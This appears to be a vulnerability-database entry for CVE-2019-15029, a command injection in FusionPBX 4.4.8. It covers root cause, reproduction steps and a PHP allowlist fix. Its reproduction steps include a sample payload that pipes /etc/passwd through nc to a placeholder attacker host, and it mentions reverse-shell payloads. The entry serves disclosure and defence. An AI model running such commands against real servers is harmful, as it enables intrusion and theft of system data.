CVE-2019-15029
Description
FusionPBX 4.4.8 allows an attacker to execute arbitrary system commands by submitting a malicious command to the service_edit.php file (which will insert the malicious command into the database). To trigger the command, one needs to call the services.php file via a GET request with the service id followed by the parameter a=start to execute the stored command.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
FusionPBX 4.4.8 allows authenticated remote code execution via arbitrary command injection in service start command.
Vulnerability
FusionPBX version 4.4.8 contains a command injection vulnerability in the service management functionality. The /app/services/service_edit.php script accepts a POST parameter service_cmd_start which is intended for specifying a command to start a service. Although the parameter is passed through a check_str() function for basic filtering, it does not sufficiently sanitize the input to prevent injection of arbitrary system commands. The malicious command is stored in the database. Subsequently, the /app/services/services.php script retrieves the stored command and executes it when a GET request with a=start and the corresponding service ID is made. This allows an authenticated attacker to execute arbitrary system commands on the server [1][2].
Exploitation
An attacker must first obtain valid administrative credentials for the FusionPBX web interface. With authenticated access, the attacker sends a POST request to service_edit.php containing a crafted service_cmd_start value (e.g., a system command such as id > /tmp/out). The attacker then triggers execution by sending a GET request to services.php with the newly created service ID and the parameter a=start. No additional user interaction is required beyond the initial authentication [1][2].
Impact
Successful exploitation results in remote code execution with the privileges of the web server user (typically www-data). This allows the attacker to execute arbitrary commands, read or modify sensitive files, install backdoors, or pivot to internal networks. The compromise leads to full control of the FusionPBX server and potential data exfiltration or further lateral movement [1][2].
Mitigation
As of the publication date (2019-09-05), the vendor has not released an official patch for this vulnerability. Users of FusionPBX 4.4.8 should upgrade to a later version if available. Workarounds include restricting network access to the administrative interface, implementing strong authentication, and monitoring logs for suspicious service creation or execution attempts. This CVE is not listed in the CISA Known Exploited Vulnerabilities catalog [1][2].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- FusionPBX/FusionPBX
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing shell-command sanitization: the `check_str()` function only escapes SQL-special characters, and the stored `service_cmd_start` value is passed directly to `shell_exec()` without validation."
Attack vector
An authenticated attacker first sends a POST request to `service_edit.php` with a malicious `service_cmd_start` value (e.g., a reverse shell command). The `check_str()` function escapes SQL-special characters but does not sanitize shell metacharacters, so the payload is stored verbatim in the `v_services` table [ref_id=1]. The attacker then sends a GET request to `services.php` with the service UUID as the `id` parameter and `a=start`. The script retrieves the stored `service_cmd_start` from the database and passes it to `shell_exec()`, executing the attacker's command on the operating system [ref_id=1].
Affected code
The vulnerability resides in `/app/services/services.php` (lines ~76–102) and `/app/services/service_edit.php` (line ~56). In `services.php`, the `service_cmd_start` and `service_cmd_stop` values are fetched from the database and passed directly to `shell_exec()` without sanitization [ref_id=1]. In `service_edit.php`, the POST parameter `service_cmd_start` is accepted and stored into the database after only SQL-escaping via `check_str()`, which does not filter shell metacharacters [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory [ref_id=1] identifies the root cause as the lack of shell-command sanitization: `check_str()` only prevents SQL injection but does not filter shell metacharacters, and `shell_exec()` is called with user-controlled database values. The recommended remediation would be to validate that `service_cmd_start` and `service_cmd_stop` contain only expected, safe commands (e.g., a whitelist of allowed service binaries) and to avoid passing arbitrary user-supplied strings to `shell_exec()`.
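The remediation described above (validate against an allowlist of service binaries, never hand a raw user-supplied string to `shell_exec()`) as an added PHP illustration; this is not FusionPBX's own code, and the allowlist, the argument patterns and the function names are assumptions:

```php
<?php
// Added example, not FusionPBX code. The pattern the advisory describes is
// shell_exec($row['service_cmd_start']) on a value that was only SQL-escaped
// by check_str(); the risk is shell metacharacters, which SQL escaping ignores.

// Assumed allowlist: absolute path of each binary an operator may use to
// start or stop a service, mapped to the argument pattern it accepts.
const ALLOWED_SERVICE_BINARIES = [
    '/usr/bin/systemctl' => '/^(start|stop|restart|status) [A-Za-z0-9_.@-]+$/',
    '/usr/sbin/service'  => '/^[A-Za-z0-9_.-]+ (start|stop|restart|status)$/',
];

/**
 * Validate a stored service_cmd_start / service_cmd_stop value.
 * Returns the argv array to execute, or null if the command is not permitted.
 */
function validate_service_command(string $cmd): ?array {
    // Reject any shell metacharacter outright, before looking at the binary.
    if (preg_match('/[;&|`$<>\\\\\'"()\n\r]/', $cmd)) {
        return null;
    }
    $parts  = preg_split('/\s+/', trim($cmd));
    $binary = array_shift($parts);
    if (!isset(ALLOWED_SERVICE_BINARIES[$binary])) {
        return null;                       // unknown or relative binary
    }
    if (!preg_match(ALLOWED_SERVICE_BINARIES[$binary], implode(' ', $parts))) {
        return null;                       // arguments outside the pattern
    }
    return array_merge([$binary], $parts);
}

/** Run a validated command; each argv element is escaped on its own. */
function run_service_command(string $cmd): ?string {
    $argv = validate_service_command($cmd);
    if ($argv === null) {
        error_log('rejected service command: ' . $cmd);   // audit trail
        return null;
    }
    return shell_exec(implode(' ', array_map('escapeshellarg', $argv)));
}

// Constructed inputs: the first is accepted, the second (the page's
// "id > /tmp/out" appended with a separator) is rejected and logged.
var_dump(validate_service_command('/usr/bin/systemctl restart freeswitch'));
var_dump(validate_service_command('/usr/bin/systemctl restart freeswitch; id > /tmp/out'));
```

The rejection log line is the hook for the monitoring the Mitigation section recommends: a burst of rejected commands from one session is a direct signal of an attempt on this flaw.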
Preconditions
- auth: Attacker must have valid FusionPBX user credentials (authenticated session).
- network: Attacker must be able to reach the FusionPBX web interface over the network.
- config: The application must be configured with a database backend (MySQL, PostgreSQL, or SQLite); no special DB configuration is required.
- input: Attacker supplies arbitrary shell commands via the `service_cmd_start` POST parameter.
Reproduction
1. Log in to FusionPBX with valid credentials.
2. Send a POST request to `/app/services/service_edit.php` with `service_name`, `service_type`, `service_data`, `service_cmd_start` (containing the malicious command, e.g., `cat /etc/passwd | nc ATTACKER_IP ATTACKER_PORT`), `service_cmd_stop`, `service_description`, and `submit=Save`.
3. Retrieve the service UUID from the response or by parsing the services list page.
4. Send a GET request to `/app/services/services.php?id=<SERVICE_UUID>&a=start`. The command stored in `service_cmd_start` executes on the server.
Full Python exploit code is provided in [ref_id=2].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- drive.google.com/file/d/1bt08NSUaxu87LJJGdNd7LpvZ2uGauRK8/view (MISC)
- gist.github.com/mhaskar/7a6a804cd68c7fec4f9d1f5c3507900f (MISC)
- shells.systems/fusionpbx-v4-4-8-authenticated-remote-code-execution-cve-2019-15029/ (MISC)
News mentions
No linked articles in our index yet.